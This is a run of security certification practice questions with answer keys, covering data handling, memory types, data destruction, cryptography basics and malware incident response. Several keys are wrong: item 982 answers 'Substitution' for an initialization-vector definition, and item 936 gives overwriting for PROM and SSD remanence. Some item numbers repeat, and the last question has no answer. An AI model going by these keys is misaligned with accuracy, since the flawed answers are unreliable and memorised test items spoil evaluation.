Answer: A. RAM Explanation: RAM (Random Access Memory) is a type of computer memory used to read and write data that is being actively used or processed by the computer. Hence, it is an example of “data in use.”
917
When viewed independently, which data elements can be considered PII? A. Work ZIP code B. Home address C. Gender D. Age
Answer: B. Home address Explanation: A home address can identify an individual even when seen in isolation. Hence, it is considered PII.
918
Who updates the system security plan when a significant change occurs? A. Business owner B. Data processor C. Data owner D. System owner
Answer: D. System owner Explanation: The system owner, or information system owner or information owner, is typically responsible for the overall procurement, development, integration, modification, or operation and maintenance of the information system. When there is a significant change in the system, they are primarily responsible for updating the system security plan (SSP). This includes documenting changes in the system environment, updating the system inventory, and reevaluating the security controls. The business owner, data processor, and data owner also have crucial roles in the organization but are not primarily responsible for the SSP. The business owner usually oversees the business process that the system supports. The data processor processes data on behalf of the data owner, who is responsible for the data’s accuracy, privacy, and security.
919
What is the most important factor when determining a data classification level? A. Format of the data B. Value of the data C. Identity of the data owner D. Size of the data
Answer: B. Value of the data Explanation: The value of the data, in terms of its sensitivity and the impact if it were compromised, is the most important factor when determining a data classification level.
920
Which encryption technology among the following is capable of protecting data within an email-attached file, ensuring it remains encrypted after being received? A. AES B. TLS C. SSL D. DES
Answer: A. AES Explanation: Advanced Encryption Standard (AES) is used for encrypting files, and it keeps the file encrypted even after it is received and detached from the email. While TLS and SSL secure communication channels, they do not encrypt the file, so it would not remain encrypted after receipt. Though it can encrypt files, DES is considered insecure due to its small key size.
921
What access control policy is being implemented when you set up and integrate a non discretionary system? A. Physical access control B. Mandatory access control C. Role-based access control D. Rule-based access control
Answer: B. Mandatory access control Explanation: Mandatory access control (MAC) is a nondiscretionary access control policy regulated by a central authority. It’s based on security labels attached to each information object, and access is granted or denied based on the security clearances assigned to users.
922
You decide to use a passphrase instead of a password that can be found in the dictionary, aiming for enhanced security. In this case, the new password transforms into what? A. The strongest password B. A virtual password C. An unusual password D. A username
Answer: A. The strongest password Explanation: When you use a passphrase instead of a standard dictionary word as your password, you are essentially creating a stronger password. Passphrases are typically longer than traditional passwords, making it more difficult for attackers to guess or crack using brute force. They can include spaces and be more mnemonic, making them easier for users to remember.
923
You want the highest security protection for your company, regardless of cost. Which of the following should you choose? A. Passwords B. Smart cards C. Palm vein scanner D. Fingerprint reader
Answer: C. Palm vein scanner Explanation: Biometric systems like palm vein scanners offer the highest level of security. These systems are unique to each individual and are more difficult to replicate or forge than passwords or smart cards.
924
What is the term for a control category that responds after an incident? A. Corrective control B. Directive control C. Preventative control D. Deterrent control
Answer: A. Corrective control Explanation: Corrective controls are implemented in response to a security incident. They aim to limit the extent of any damage caused, recover the system’s normal functions, and correct any system weaknesses identified during the incident.
925
What is the correct sequence of the asset life cycle phases? A. Create, use, share, store, archive, and destroy B. Create, share, use, archive, store, and destroy C. Create, store, use, share, archive, and destroy D. Create, share, archive, use, store, and destroy
Answer: A. Create, use, share, store, archive, and destroy Explanation: The correct sequence of asset life cycle phases is create, use, share, store, archive, and destroy. This sequence reflects the typical progression of an asset’s life.
926
As a security manager, you are tasked with investigating a recent breach into the corporate network. Under what control category does this fall? A. Retroactive control B. Investigatory control C. Preventative control D. Detective control
Answer: D. Detective control Explanation: Detective controls are designed to discover and react to occurring incidents. In this case, investigating a breach is an example of a detective control, as you are identifying the cause and impact of the incident that has already taken place.
928
Which of the following is the BEST definition of defensible destruction? A. The destruction of assets using defense approved methods B. The destruction of assets in a controlled, legally defensible, and compliant manner C. The destruction of assets without the possibility of recovering those assets D. The destruction of assets using a method that may not allow attackers to recover data
Answer: B. The destruction of assets in a controlled, legally defensible, and compliant manner Explanation: Defensible destruction refers to destroying assets in a way that complies with legal and regulatory requirements and can be defended if questioned.
929
How does an asset classification program enhance an organization’s ability to fulfill its objectives and goals? A. By meeting the audit function’s requirements B. By controlling changes to production environments C. By reinforcing principles of ownership D. By outlining controls to protect valuable assets
Answer: D. By outlining controls to protect valuable assets Explanation: Asset classification assists in identifying the most critical and valuable assets, enabling an organization to allocate resources and controls effectively to protect these assets. This leads to an improved ability to achieve its goals and objectives.
930
In a setting where asset classification has been implemented to meet privacy protection requirements, who is considered the owner and thus responsible for ensuring proper compliance and protection? A. Data processor B. Data subject C. Data controller D. Data steward
Answer: C. Data controller Explanation: In the context of data privacy, the data controller is the entity that determines the purposes and means of processing personal data. They are responsible for ensuring that the processing complies with relevant laws and regulations.
931
Which of the following is NOT a principle of privacy protection from the Organization for Economic Cooperation and Development (OECD)? A. Collection Limitation Principle B. Right to be Forgotten Principle C. Use Limitation Principle D. Accountability Principle
Answer: B. Right to be Forgotten Principle Explanation: The Right to be Forgotten is not an OECD principle. It’s a provision from the General Data Protection Regulation (GDPR) of the European Union. The OECD principles include the Collection Limitation, Use Limitation, and Accountability principles, among others.
932
All of the following are necessary for effective retention requirements in organizations EXCEPT A. Policy B. Awareness, education, training C. Understanding of compliance-related requirements D. Data steward
Answer: D. Data steward Explanation: While a data steward can help manage and enforce data policies, they’re not a requirement for effective retention requirements. Policies, education, training, and an understanding of compliance requirements are all necessary.
933
Which of the following is not an objective of baseline security controls used in protecting assets? A. Specific steps that must be executed B. Minimum level of security controls C. It may be associated with specific architectures and systems D. A consistent reference point
Answer: A. Specific steps that must be executed Explanation: Baseline security controls do provide a minimum level of security, can be associated with specific architectures and systems, and serve as a consistent reference point. However, they do not dictate specific steps that must be executed. While they set a base standard, the specific steps to achieve this standard can vary based on the organization’s unique needs and circumstances.
934
Which of the following is the BEST definition of scoping? A. Altering baselines to apply more specifically B. Modifying assumptions based on previously learned behavior C. Limiting general baseline recommendations by removing those that do not apply D. Responsible protection of assets based on goals and objectives
Answer: C. Limiting general baseline recommendations by removing those that do not apply Explanation: Scoping involves tailoring baseline security recommendations to fit the specific circumstances of an organization. This may involve removing recommendations that are not applicable, adding additional controls where necessary, or modifying existing recommendations to better suit the organization’s needs.
935
How would you define “scoping” in the context of implementing new standards and frameworks in our organization? A. Implementing the complete standard or framework but setting higher standards in certain areas B. Selectively implementing parts of the standard or framework based on relevance C. Assessing the cost implications of the implementation D. Evaluating the suitability of the standard for the organization
Answer: B. Selectively implementing parts of the standard or framework based on relevance Explanation: Scoping involves adapting a standard or framework to suit the specific circumstances of an organization, which might involve selecting only those parts that are relevant or useful to the organization.
936
What data destruction method would be most suitable for eliminating data remanence on devices like PROM, flash memory, and SSD drives? A. Degaussing B. Overwriting C. Shredding D. Formatting
Answer: B. Overwriting Explanation: Overwriting is the process of replacing existing data with new data, which can be used to effectively eliminate data remanence on rewritable memory like PROM, flash memory, and SSD drives.
937
In which of the three states of data is encryption protection unfeasible? A. Data at rest B. Data in motion C. Data in use D. Data on backup tapes
Answer: C. Data in use Explanation: While data is in use, it is typically in an unencrypted state as it is being processed or accessed. Thus, it is difficult to apply encryption protection to data in this state.
938
What type of memory is utilized in flash drives? A. SDRAM B. PROM C. EEPROM D. DRAM
Answer: C. EEPROM Explanation: Flash drives use Electrically Erasable Programmable Read-Only Memory (EEPROM), which allows data to be electrically erased and reprogrammed.
939
What method should be employed to erase EPROM memory for a firmware upgrade? A. It’s not possible to erase EPROM once it’s written. B. Software programs can be used to erase content. C. Exposure to UV light. D. Degaussing the chip after removing it from the motherboard.
Answer: C. Exposure to UV light Explanation: Erasable Programmable Read-Only Memory (EPROM) can be erased by exposing it to strong UV light, allowing it to be rewritten.
940
What are some methods for protecting data while an employee actively uses it? A. Encryption, clean desk policies, and view angle screens B. Clean desk policies, view angle screens, and automatic computer locking when not in use C. A need-to-know policy D. Clean desk policies, print policies, job rotation, mandatory vacations, and view angle screens
Answer: D. Clean desk policies, print policies, job rotation, mandatory vacations, and view angle screens Explanation: All these measures can contribute to protecting data in use. The need-to-know policy, while valuable, does not directly address the protection of data in use.
942
What is one way to protect data at rest? A. Clean desk policy B. Privacy screens for monitors C. Encryption D. Discretionary access control (DAC)
Answer: C. Encryption Explanation: Encryption is a primary method for protecting data at rest. It renders the data unreadable without the correct decryption key, thereby protecting it even if physical security measures fail.
943
On what basis should the duration for keeping backups be decided? A. Permanently B. For a month, as long as we have a full backup of everything C. As long as it is useful or required, whichever is longer D. All data is required to be kept for one year
Answer: C. As long as it is useful or required, whichever is longer Explanation: The duration for keeping backups should be based on both the utility of the data and any legal or regulatory requirements. Some data may need to be kept for a specific period due to regulations, while other data may be useful for business purposes for a certain length of time.
944
Which type of memory is considered volatile? A. DRAM B. PROM C. Flash Memory D. EEPROM
Answer: A. DRAM Explanation: Dynamic Random Access Memory (DRAM) is a type of volatile memory. It retains data as long as it’s powered on, but once the power is turned off, the data is lost.
946
Which type of Read-Only Memory (ROM) can only be programmed once? A. EPROM B. EEPROM C. PROM D. APROM
Answer: C. PROM Explanation: Programmable Read-Only Memory (PROM) can be programmed using a special device. This process can only happen once. Once the PROM has been programmed, the data written to it is permanent and cannot be erased or rewritten.
947
Why would we opt to use multiple forms of data destruction on our sensitive information? A. Because it is easier than just a single type of data destruction B. To ensure there is no data remanence C. To ensure data is still accessible after the destruction D. To make sure we have the old drives available
Answer: B. To ensure there is no data remanence Explanation: Multiple forms of data destruction are used to ensure there is no data remanence, which means ensuring that no remnants of data remain that could be potentially recovered.
948
What is a typical attack on our data at rest? A. Cryptanalysis B. Shoulder surfing C. Eavesdropping D. All of these
Answer: A. Cryptanalysis Explanation: Cryptanalysis, or attempting to break encryption or cryptographic systems, is a common attack method targeting data at rest.
949
An attacker has stolen one of our backup tapes. What could prevent the data on the tape from being accessible? A. Proper data handling B. Proper data storage C. Proper data retention D. Proper data encryption
Answer: D. Proper data encryption Explanation: Encryption is a process that transforms readable data into unreadable data. An attacker could not access the data without the decryption key if the backup tapes were adequately encrypted.
950
Looking at the data classification classes of the US government: data that, if disclosed, won’t cause any harm to national security would be classified as? A. Unclassified B. Confidential C. Secret D. Top Secret
Answer: A. Unclassified Explanation: In US government data classification, data that wouldn’t harm national security if disclosed is typically classified as “Unclassified.”
951
Which of these is a common attack against data at rest? A. Stealing unencrypted laptops B. MITM (man in the middle) C. Screen scrapers D. Keyloggers
Answer: A. Stealing unencrypted laptops Explanation: Stealing unencrypted laptops is a common attack against data at rest because the data on these devices is easy to access if not encrypted.
952
In designing our data retention policy, which should not be considered? A. Which data do we keep? B. How long do we keep the data? C. Where do we keep the backup data? D. How to safely destroy the data after the retention has expired?
Answer: C. Where do we keep the backup data? Explanation: While the location of the backup data is an important aspect of data management, it is not directly related to the data retention policy, which focuses on the duration and manner of data retention.
953
We have many policies we need to adhere to in our organization. Which of these would be part of our clean desk policy? A. Minimal use of paper copies and only used while at the desk and in use B. Cleaning your desk of all the clutter C. Shred all paper copies of everything D. Picking up anything you print as soon as you print it
Answer: A. Minimal use of paper copies and only used while at the desk and in use Explanation: A clean desk policy typically involves minimizing the use of paper copies and ensuring they are only in use while at the desk, to prevent unauthorized access to sensitive information.
954
What are we trying to eliminate with data disposal? A. Data remanence B. How long do we keep the data C. The data content D. The data in use
Answer: A. Data remanence Explanation: The primary purpose of data disposal is to eliminate data remanence, or residual data that remains after data deletion or erasure, which could be potentially recovered and exploited.
955
When assigning sensitivity to our data, which of these should not be a factor? A. Who will have access to the data B. What the data is worth C. How bad a data exposure would be D. How the data will be used
Answer: D. How the data will be used Explanation: Although how the data is used can influence its sensitivity, the primary factors in determining sensitivity are who has access, its value, and the potential impact of its exposure.
956
Which of these would be something we would consider for proper data disposal of SSD drives? A. Degaussing B. Formatting C. Deleting all files D. Shredding
Answer: D. Shredding Explanation: Shredding, or physically destroying the SSD, is one of the most secure data disposal methods for solid-state drives.
957
Which of these would be something we can implement to protect our data in use better? (Select all that apply.) A. Clean desk policy B. Encryption C. View angle privacy screen for monitors D. Print policy E. Workstation locking
Answer: A, C, D, E. Clean desk policy, View angle privacy screen for monitors, Print policy, Workstation locking Explanation: All of these, except encryption, are strategies that can be used to protect data. Encryption is typically used for data at rest or in motion.
958
Which of these should we encrypt if we are dealing with sensitive data? A. Hard disks B. Backup tapes C. Data sent over the network D. All of these
Answer: D. All of these Explanation: When dealing with sensitive data, it is important to encrypt all these forms of data storage and transmission to ensure the security of the data.
959
What would be the role of the data custodian? A. Make the policies, procedures, and standards that govern our data security B. Perform the backups and restores C. Be trained in the policies, procedures, and standards D. Assign the sensitivity labels and backup frequency of the data
Answer: B. Perform the backups and restores Explanation: A data custodian’s primary role is to manage and handle the data, which includes performing backups and restorations.
960
Which of these could be a common attack on our data in motion? A. Cryptanalysis B. Shoulder surfing C. Eavesdropping D. All of these
Answer: C. Eavesdropping Explanation: Eavesdropping, or interception of information in transit, is a common type of attack on data in motion.
961
We’ve introduced logging on our backup servers to monitor employee data access. What does this demonstrate? A. Proper data handling B. Proper data storage C. Proper data retention D. Proper data encryption
Answer: A. Proper data handling Explanation: Implementing logs to monitor who accesses what data on your backup servers is an example of proper data handling. This is a measure to ensure accountability and traceability in the event of any unauthorized or suspicious activities.
962
We’re discarding many hard drives in line with our hardware disposal and no data remanence policy. What method would we use to guarantee zero data remanence on damaged SSD drives? A. Degauss B. Overwrite C. Incinerate D. Format
Answer: C. Incinerate Explanation: While all options can erase data, incineration is the most thorough method to ensure there is no data remanence on SSD drives. It physically destroys the drives, making data recovery impossible.
963
Who bears the responsibility for our organization’s day-to-day financial leadership? A. The CEO B. The CFO C. The CIO D. The CSO
Answer: B. The CFO Explanation: The CFO, or Chief Financial Officer, is typically responsible for the day-to-day financial leadership of an organization.
964
Which activity would we perform during the eDiscovery process? A. Discover all the electronic files we have in our organization B. Produce electronic information to internal or external attorneys or legal teams C. Make sure we keep data long enough in our retention policies for us to fulfill the legal requirements for our state and sector D. Delete data that has been requested if the retention period has expired
Answer: B. Produce electronic information to internal or external attorneys or legal teams Explanation: The e-discovery process typically involves producing electronic information for internal or external legal teams in preparation for legal proceedings.
965
How is data classified in the US government’s data classification scheme if its disclosure could cause serious damage to national security? A. Unclassified B. Confidential C. Secret D. Top Secret
Answer: C. Secret Explanation: In the US government’s data classification scheme, information is classified as Secret when its unauthorized disclosure could reasonably be expected to cause serious damage to national security.
966
For what type of data would we want to implement end-to-end encryption? A. Data at rest B. Data in use C. Data in motion D. All of these
Answer: C. Data in motion Explanation: End-to-end encryption is most relevant for data in motion. It’s a secure communication method that prevents third parties from accessing data while it’s transferred from one end system to another.
967
What is the primary goal of information classification within an organization? A. To increase the workload of IT staff B. To facilitate communication between departments C. To protect the confidentiality, integrity, and availability of data D. To make data more accessible
Answer: C. To protect the confidentiality, integrity, and availability of data Explanation: The primary goal of information classification is to protect the confidentiality, integrity, and availability of data by identifying the sensitivity of data and implementing suitable controls to protect it.
968
Which one of the following is NOT a typical level of data classification in a private sector organization? A. Proprietary B. Confidential C. Top Secret D. Public
Answer: C. Top Secret Explanation: The Top Secret classification is typically used within government organizations, not the private sector.
969
Who is typically responsible for data classification in an organization? A. IT department B. Data owner C. Security team D. All employees
Answer: B. Data owner Explanation: The data owner, who is usually someone with appropriate authority within the organization, is typically responsible for data classification.
970
What is the role of a data custodian in an organization? A. Define data classification levels B. Implement controls as defined by the data owner C. Determine how long data should be retained D. Create new datasets
Answer: B. Implement controls as defined by the data owner Explanation: The data custodian is responsible for the implementation of the controls defined by the data owner, including storage, protection, and retrieval of datasets.
971
Which of the following best describes data remanence? A. Data that remains on a storage medium after it has been deleted B. Data that is stored in the cloud C. Data that is currently in use D. Data that is being transmitted over a network
Answer: A. Data that remains on a storage medium after it has been deleted Explanation: Data remanence refers to the residual representation of data that remains even after attempts have been made to remove or erase the data.
972
What is the purpose of a data retention policy? A. To define how long data should be kept before it is deleted B. To ensure data is accessible to all employees C. To classify data according to its sensitivity D. To protect data from malware attacks
Answer: A. To define how long data should be kept before it is deleted Explanation: A data retention policy outlines how long data should be stored based on regulatory requirements, business needs, and data value.
973
Which one of the following is NOT a factor in determining data retention periods? A. Regulatory requirements B. Business needs C. The size of the data D. Legal considerations
Answer: C. The size of the data Explanation: While the size of the data may affect storage requirements, it typically does not determine the length of data retention periods.
974
What is the primary goal of privacy laws and regulations? A. To make data more accessible B. To protect the rights of individuals with respect to their personal data C. To classify data according to its sensitivity D. To ensure data is retained for the correct period of time
Answer: B. To protect the rights of individuals with respect to their personal data Explanation: The primary goal of privacy laws and regulations is to protect individuals’ rights regarding their personal data, including how it is collected, stored, used, and shared.
975
When considering the life cycle of information, what is typically the final stage? A. Creation B. Distribution C. Storage D. Destruction
Answer: D. Destruction Explanation: The final stage of the information life cycle is typically destruction, during which data is destroyed in a way that ensures it cannot be reconstructed or recovered.
976
What type of security control is data encryption? A. Preventative B. Detective C. Corrective D. Recovery
Answer: A. Preventative Explanation: Encryption is a preventative control that protects data confidentiality and integrity by transforming plaintext into ciphertext that is unreadable without the decryption key.
977
Cryptographic systems of symbols that operate on words or phrases and are sometimes secret but don't always provide confidentiality Code Cipher
Code
978
In Cryptography "Are always meant to hide the true meaning of a message" and are always a secret Code Cipher
Cipher
980
In Cryptography "A symmetric key cipher where plaintext digits are combined with a pseudorandom cipher digit stream (keystream). In a stream cipher, each plaintext digit is encrypted one at a time with the corresponding digit of the keystream, to give a digit of the ciphertext stream." Substitution Stream Cipher Block Cipher Substitution Transposition initialization vector (IV)
Stream Cipher
981
In Cryptography "A method of encrypting text to produce ciphertext in which a cryptographic key and algorithm are applied to a block of data at once as a group rather than to one bit at a time." Substitution Stream Cipher Block Cipher Substitution Transposition initialization vector (IV)
Block Cipher
982
In Cryptography "A random bit string (a nonce) that is the same length as the block size that is XORed with the message. IVs are used to create a unique ciphertext every time the same message is encrypted with the same key." Substitution Stream Cipher Block Cipher Substitution Transposition initialization vector (IV)
Substitution
983
In Cryptography "Uses an encryption algorithm to rearrange the letters of a plaintext message, forming the ciphertext message."
Transposition
984
In cryptography, an ___________ or starting variable is an input to a cryptographic primitive being used to provide the initial state. The IV is typically required to be random or pseudorandom, but sometimes an IV only needs to be unpredictable or unique. Randomization is crucial for some encryption schemes to achieve semantic security, a property whereby repeated usage of the scheme under the same key does not allow an attacker to infer relationships between (potentially similar) segments of the encrypted message. For block ciphers, the use of an IV is described by the modes of operation.
initialization vector (IV)
985
In Cryptography, there are three similar stream ciphers. The only difference is key length. This cipher uses a key of one, also known as a shift cipher. Vigenere One Time Pad Caesar
Caesar
986
In Cryptography, there are three similar stream ciphers. The only difference is key length. This cipher uses a longer key, a word or a sentence. Vigenere One Time Pad Caesar
Vigenere
987
In Cryptography, there are three similar stream ciphers. The only difference is key length. This cipher uses a key that is as long as the message itself. Vigenere One Time Pad Caesar
One Time Pad
988
In Cryptography, for this cipher the key must be generated randomly without any known patterns, must be used once, and then discarded. Vigenere One Time Pad Caesar
One Time Pad
989
Is a communication concept. A specific type of information is exchanged, but no real data is transferred, as with digital signatures and digital certificates. More simply it enables one to prove knowledge of a fact to another individual without revealing the fact itself. Zero Knowledge proof Split Knowledge Work function - Work factor
Zero Knowledge proof
990
This means that the information or privilege required to perform an operation is divided among multiple users, ensuring that no single person has sufficient privileges to compromise the security of the environment. Zero Knowledge proof Split Knowledge Work function - Work factor
Split Knowledge
991
Is a way to measure the strength of a cryptographic system by measuring the effort, in terms of cost and/or time, to decrypt messages: the time and effort required to break a protective measure. Zero Knowledge proof Split Knowledge Work function - Work factor
Work function - Work factor
992
Relies on the use of a shared key. Lacks support for scalability, easy key distribution, and non repudiation. Symmetric Asymmetric
Symmetric
993
Public-private key pairs for communication between parties. Supports scalability, easy key distribution, and non repudiation. Symmetric Asymmetric
Asymmetric
994
Which of these is faster? Symmetric Asymmetric
Symmetric
995
Which is stronger? Symmetric Asymmetric
Asymmetric
996
Is one of the major goals of cryptography. It protects the SECRECY of data while it is both at rest and in transit. Confidentiality Integrity Non Repudiation
Confidentiality
997
Provides the recipient of a message with the assurance that DATA WAS NOT ALTERED (intentionally or unintentionally) between the time it was created and the time it was accessed. Confidentiality Integrity Non Repudiation
Integrity
998
Provides UNDENIABLE PROOF that the sender of a message actually authored it. It prevents the sender from subsequently denying that they sent the original message. Confidentiality Integrity Non Repudiation
Non Repudiation
999
Cryptography Operation modes - Simplest, least secure mode. Processes 64 bit blocks, encrypting each block with the chosen key. If the same block is encountered multiple times, the same encrypted block is produced, which makes it easy to break. Electronic Codebook Mode (ECB) Cipher Block (CBC) Cipher Feedback (CFB) Output Feedback (OFB) Counter (CTR)
Electronic Codebook Mode (ECB)
1000
Cryptography Operation modes - Each block of unencrypted text is XORed with the ciphertext block immediately preceding it. Decryption simply decrypts the ciphertext and reverses the XOR operation. Electronic Codebook Mode (ECB) Cipher Block (CBC) Cipher Feedback (CFB) Output Feedback (OFB) Counter (CTR)
Cipher Block (CBC)
1001
Cryptography Operation modes - Is the streaming version of CBC. Works on data in real time, using memory buffers of the same block size. When the buffer is full, the data is encrypted and transmitted. USES CHAINING, SO ERRORS PROPAGATE. Electronic Codebook Mode (ECB) Cipher Block (CBC) Cipher Feedback (CFB) Output Feedback (OFB) Counter (CTR)
Cipher Feedback (CFB)
1002
Cryptography Operation modes - Operates similarly to CFB, BUT XORs the plaintext with a seed value. No chaining function, so errors do not propagate. Electronic Codebook Mode (ECB) Cipher Block (CBC) Cipher Feedback (CFB) Output Feedback (OFB) Counter (CTR)
Output Feedback (OFB)
1003
Cryptography Operation modes - Uses an incrementing counter instead of a seed. Errors do not propagate. Electronic Codebook Mode (ECB) Cipher Block (CBC) Cipher Feedback (CFB) Output Feedback (OFB) Counter (CTR)
Counter (CTR)
1004
Out of all of these Cryptography Operation modes, which do not propagate errors? Electronic Codebook Mode (ECB) Cipher Block (CBC) Cipher Feedback (CFB) Output Feedback (OFB) Counter (CTR)
Output Feedback (OFB) Counter (CTR)
1005
XOR Cipher - Binary values match = 0, otherwise cipher value is 1 True False
True
1006
DES Electronic Code Book mode uses an initialization vector or chaining, and patterns can be clearly visible in the resulting ciphertext A. True B. False
B. False
1007
In symmetric encryption, chaining (called feedback in stream modes) seeds the previous encrypted block into the next block ready for encryption. This destroys patterns in the resulting ciphertext. A. True B. False
A. True
1008
XOR Cipher - Binary values match = 1, otherwise cipher value is 0 True False
False
1009
A weakness in cryptography where a plain-text message generates identical ciphertext messages using the same algorithm but using different keys. Public keys Key clustering
Key clustering
1010
Are shared among communicating parties Public Keys Private Keys
Public Keys
1011
Private keys are kept secret Public Keys Private Keys
Private Keys
1012
To encrypt a message (data) Use the recipient's public key Use the sender's public key
Use the recipient's public key
1013
To decrypt a message (data) Use the recipient's private key Use your own private key
Use your own private key
1014
To sign a message (Digital Signature) Use the recipient's private key Use your own private key
Use your own private key
1015
To validate a Digital Signature Use the sender's public key Use your own private key
Use the sender's public key
1016
Which of the following is a reactive countermeasure in defending against worms? a. Packet filtering firewalls b. Stackguarding c. Virus scanning tool d. Virtual machine
c. Virus scanners, being one of the reactive (detective) countermeasures, search for "signature strings" or use algorithmic detection methods to identify known viruses. These reactive methods have no hope of preventing fast-spreading worms or worms that use zero-day exploits to carry out their attacks. The other three choices are examples of proactive (preventive) countermeasures. Packet-filtering firewalls block all incoming traffic except what is needed for the functioning of the network. Stack guarding prevents worms from gaining increased privileges on a system. A virtual machine prevents potentially malicious software from using the operating system for illicit actions.
1017
Which of the following is not part of malware incident detection and analysis phase? a. Understanding signs of malware incidents b. Acquiring tools and resources c. Identifying malware incident characteristics d. Prioritizing incident response
b. Acquiring tools and resources is a part of the preparation phase. These tools and resources may include packet sniffers and protocol analyzers. The other three choices are incorrect because they are a part of the detection phase. The malware incident response life cycle has four phases, including (i) preparation, (ii) detection and analysis, (iii) containment, eradication, and recovery, and (iv) post-incident activity.
1018
Which of the following statements is true about application software testing? a. Basic testing equals black-box testing. b. Comprehensive testing equals black-box testing. c. Basic testing equals gray-box testing. d. Comprehensive testing equals focused testing.
a. Basic testing is a test methodology that assumes no knowledge of the internal structure and implementation details of the assessment object. Basic testing is also known as black-box testing. Comprehensive testing is a test methodology that assumes explicit and substantial knowledge of the internal structure and implementation details of the assessment object. Comprehensive testing is also known as white-box testing. Focused testing is a test methodology that assumes some knowledge of the internal structure and implementation details of the assessment object. Focused testing is also known as gray-box testing.
1018
Which of the following cannot handle the complete workload of a malware incident and cannot ensure a defense-in-depth strategy? a. Antivirus software b. E-mail filtering c. Network-based intrusion prevention system software d. Host-based IPS software
a. In a widespread incident, if malware cannot be identified by updated antivirus software, or updated signatures are not yet fully deployed, organizations should be prepared to use other security tools to contain the malware until the antivirus signatures can perform the containment effectively. Expecting antivirus software to handle the complete workload of a malware incident is unrealistic during high-volume infections. By using a defense-in-depth strategy for detecting and blocking malware, an organization can spread the workload across multiple components. Antivirus software alone cannot ensure a defense-in-depth strategy. Automated detection methods other than antivirus software are needed to ensure a defense-in-depth strategy. These detection methods include e-mail filtering, network-based intrusion prevention system (IPS) software, and host-based IPS software.
1019
Which of the following is true about a stealth virus? a. It is easy to detect. b. It is a resident virus. c. It can reveal file size increases. d. It doesn’t need to be active to show stealth qualities.
b. A stealth virus is a resident virus that attempts to evade detection by concealing its presence in infected files. An active stealth file virus can typically not reveal any size increase in infected files, and it must be active to exhibit its stealth qualities.
1019
Defining roles and responsibilities is important in identifying infected hosts with malware incidents before security incidents occur. Which of the following groups can primarily assist with identifying infected servers? a. Security administrators b. System administrators c. Network administrators d. Desktop administrators
b. Organizations should identify which individuals or groups can assist in infection identification efforts. System administrators are good at identifying infected servers such as domain name system (DNS), email, and Web servers. The roles of the other three administrators are different from separation of duties, independence, and objectivity viewpoints.
1020
Which of the following is not a common tool for eradication of malware from an infected host? a. Antivirus software b. Spam-filtering software c. Spyware detection and removal utility software d. Patch management software
b. Spam-filtering software, whether host-based or network-based, is effective at stopping known e-mail-based malware that uses the organization's e-mail services and is effective at stopping some unknown malware. The most common tools for eradication are antivirus software, spyware detection and removal utility software, patch management software, and dedicated malware removal tools.
1020
Organizations should strongly consider rebuilding a system that has which of the following malware incident characteristics? 1. Unauthorized administrator-level access. 2. Changes to system files. 3. The system is unstable. 4. The extent of damage is unclear. a. 1 only b. 2 and 3 c. 3 and 4 d. 1, 2, 3, and 4
d. If an incident has resulted in unauthorized administrator-level access, changes to system files, unstable system, and the extent of damage is unclear, organizations should be prepared to rebuild each affected system.
1021
Which of the following ways should be used to rebuild an infected host with malware incident? 1. Reinstalling the operating system 2. Reinstalling the application systems 3. Securing the operating and application systems 4. Restoring the data from known good backups a. 1 and 2 b. 3 only c. 1, 2, and 3 d. 1, 2, 3, and 4
d. Rebuild each affected system by reinstalling and reconfiguring its operating system and applications, securing the operating system and applications, and restoring the data from known good backups.
1021
Lessons learned from major malware incidents improve which of the following? 1. Security policy 2. Software configurations 3. Malware prevention software deployments 4. Malware detection software deployments a. 1 only b. 1 and 2 c. 3 and 4 d. 1, 2, 3, and 4
d. Capturing the lessons following the handling of a malware incident should help an organization improve its incident handling capability and malware defenses, including needed changes to security policy, software configurations, and malware detection and prevention software deployments.
1022
Which of the following is the correct tool and technology deployment sequence for containing malware incidents, especially when a worm attacks the network service? 1. Internet border and internal routers 2. Network-based firewalls 3. Network- and host-based antivirus software 4. Host-based firewalls a. 1, 2, 4, and 3 b. 2, 3, 1, and 4 c. 3, 4, 2, and 1 d. 4, 2, 1, and 3
c. When organizations develop strategies for malware incident containment, they should consider developing tools to assist incident handlers in selecting and implementing containment strategies quickly when a serious incident occurs. Network- and host-based antivirus software does detect and stop the worm, and identify and clean the infected systems. Host-based firewalls do block worm activity from entering or exiting hosts, reconfigure the host-based firewall itself to prevent exploitation by the worm, and update the host-based firewall software so that it is no longer exploitable. Network-based firewalls do detect and stop the worm from entering or exiting networks and subnets. Internet border and internal routers do detect and stop the worm from entering or exiting networks and subnets if the volume of traffic is too high for network firewalls to handle or if certain subnets need greater protection. The incorrect sequences listed in the other three choices do not contain malware incidents because their combined effect is not as strong and effective as the correct sequence.
1023
All the following are characteristics of a managed environment dealing with malware prevention and handling except: a. Installing antivirus software b. Requiring administrator-level privileges to end users c. Using deny-by-default policies d. Applying software patches
b. Requiring administrator-level privileges is a characteristic of a nonmanaged environment, where system owners and users have substantial control over their own systems. Owners and users can alter system configurations, making security weak. In a managed environment, one or more centralized groups have substantial control over the server and workstation operating system and application configurations across the enterprise. Recommended security practices include installing antivirus software on all hosts and keeping it up to date, using deny-by-default policies on firewalls, and applying patches to operating systems and applications. These practices enable a consistent security posture to be maintained across the enterprise.
1024
Which of the following is required to control the actions of mobile code, stationary code, or downloaded code? a. Technical controls b. Administrative controls c. Behavioral controls d. Physical controls
c. Conceptually, behavioral controls can be viewed as a software cage or quarantine mechanism that dynamically intercepts and thwarts attempts by the subject code to take unacceptable actions that violate policy. As with firewalls and antivirus products, methods that dynamically restrain mobile code were born out of necessity to supplement existing mechanisms, and represent an emerging class of security product. Such products are intended to complement firewall and antivirus products that respectively block network transactions or mobile code based on predefined signatures (i.e., content inspection), and may refer to methods such as dynamic sandboxes, dynamic monitors, and behavior monitors, used for controlling the behavior of mobile code. In addition to mobile code, this class of product may also be applicable to stationary code or downloaded code whose trustworthiness is in doubt. Technical controls, administrative controls, and physical controls are incorrect because they are not as strong as behavioral controls in combating mobile code.
1025
Which of the following is basic, low-privilege access to a computer? a. Application access b. Administrative access c. Privileged access d. Root access
a. Application access is basic, low-privilege access. It may include access to data entry, data update, data query, data output, or report programs. Administrative access, privileged access, and root access are advanced levels of access to a computer system that include the ability to perform significant configuration changes to the computer's operating system.
1026
Assume that a new computer worm is released that can spread rapidly and damage any computer in an organization unless it is stopped. The organization has 1,000 computers, the budget for in-house technical support is $500,000 per year, and the budget for outsourced technical support is $600,000. It takes an average of 4 hours for one technical support worker to rebuild a computer at a rate of $70 per hour for wages and benefits. What is the total cost for not mitigating the worm release? a. $280,000 b. $500,000 c. $560,000 d. $600,000
